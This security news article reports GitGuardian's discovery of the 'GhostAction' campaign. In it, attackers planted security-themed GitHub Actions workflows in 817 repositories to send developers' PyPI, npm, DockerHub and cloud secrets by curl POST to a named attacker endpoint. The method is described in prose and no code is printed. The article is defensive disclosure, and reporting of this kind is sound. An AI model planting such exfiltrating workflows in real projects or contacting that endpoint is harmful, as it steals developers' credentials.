New GhostAction Attack Exploits 327 GitHub Users Across 817 Repositories

Security researchers at GitGuardian have uncovered a sophisticated supply chain attack dubbed “GhostAction” that compromised 327 GitHub users across 817 repositories, successfully stealing 3,325 sensitive developer secrets.

The attack, discovered on September 5, 2025, represents one of the largest documented cases of malicious GitHub workflow injection targeting critical development infrastructure.

The campaign primarily targeted authentication tokens for popular development platforms including PyPI, npm, and DockerHub, creating significant risks for the software supply chain.

Attackers systematically injected malicious GitHub Actions workflows that silently exfiltrated credentials via HTTP POST requests to a remote server, demonstrating a sophisticated understanding of modern CI/CD security vulnerabilities.

CI/CD Infrastructure Under Sophisticated Attack

The GhostAction campaign began with the compromise of the FastUUID project, where attackers pushed a seemingly innocuous commit titled “Add Github Actions Security workflow” on September 2, 2025.

The malicious workflow was designed to automatically trigger on any code push or manual dispatch, immediately stealing PyPI API tokens from the repository’s secrets.

The attack methodology showed careful reconnaissance, with threat actors first analyzing legitimate workflow files to identify available secrets before crafting targeted exfiltration code.

Each malicious workflow followed a consistent pattern: establishing cache-busting mechanisms and then using curl commands to transmit stolen credentials to the attacker-controlled endpoint at bold-dhawan.45-139-104-115.plesk.page.

Key elements of the malicious workflow included:

• Cache-busting environment variable to avoid duplicate requests.
• Stealthy curl-based HTTP POST for exfiltration.
• Use of security-themed names to disguise malicious intent.

What made this attack particularly dangerous was its stealth approach. The workflows appeared legitimate at first glance, using security-themed names that could easily be overlooked during routine code reviews.

The attackers demonstrated patience, waiting three days after the initial FastUUID compromise before expanding operations, suggesting this was part of a larger, coordinated campaign rather than opportunistic attacks.

Coordinated Campaign Uncovered

GitGuardian’s investigation revealed the true scope extended far beyond the initial FastUUID discovery.

Using their GitHub commit historical dataset, researchers identified that the same compromised user pushed identical malicious commits to at least five other public repositories and an estimated ten private repositories on the same date.

The analysis uncovered 327 total victims across the campaign, with no overlap detected with the recent S1ngularity attack, indicating this was an entirely separate operation. The stolen credentials included a diverse range of high-value targets:

• DockerHub credentials.
• GitHub Personal Access Tokens.
• npm publishing tokens.
• AWS access keys and database credentials.

The attackers showed remarkable persistence and organization, customizing each malicious workflow to target specific secrets available in individual repositories.

Some workflows targeted cryptocurrency exchange APIs, cloud platform credentials, and database access keys, suggesting the threat actors had broad commercial interests beyond simple credential theft.

The campaign’s coordination across multiple repositories simultaneously indicates significant planning and resources behind the operation.

Swift Response Averts Damage

GitGuardian’s rapid response likely prevented catastrophic outcomes from the massive credential theft.

The research team immediately began creating alert issues across all 817 affected repositories, successfully notifying 573 projects where issues remained enabled. This disclosure strategy prompted immediate remediation efforts from affected developers.

The coordinated actions taken included:

• PyPI moved the FastUUID project to read-only status within hours.
• Compromised commit reverted by the maintainer on September 5 at 12:30 PM.
• Formal notifications sent to GitHub, npm, and PyPI security teams by 3:50 PM.

Despite the massive scale of credential theft, initial investigations found no evidence of malicious package releases during the compromise window.

However, GitGuardian identified 9 npm and 15 PyPI packages at immediate risk of compromise, requiring ongoing surveillance.

The attack’s discovery highlights critical vulnerabilities in GitHub Actions security and demonstrates the need for enhanced monitoring of CI/CD pipeline integrity across the software development ecosystem.

Indicators of Compromise (IOCs)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.